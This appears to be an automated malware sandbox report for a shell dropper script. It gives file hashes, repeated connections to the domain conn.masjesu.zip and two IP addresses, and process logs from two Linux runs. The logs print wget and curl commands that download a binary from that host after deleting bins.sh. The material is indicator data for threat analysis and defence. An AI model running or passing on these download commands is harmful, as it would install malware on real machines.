| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-21 01:58
Reported
2024-10-21 02:01
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.20:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-21 01:58
Reported
2024-10-21 02:01
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
23s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |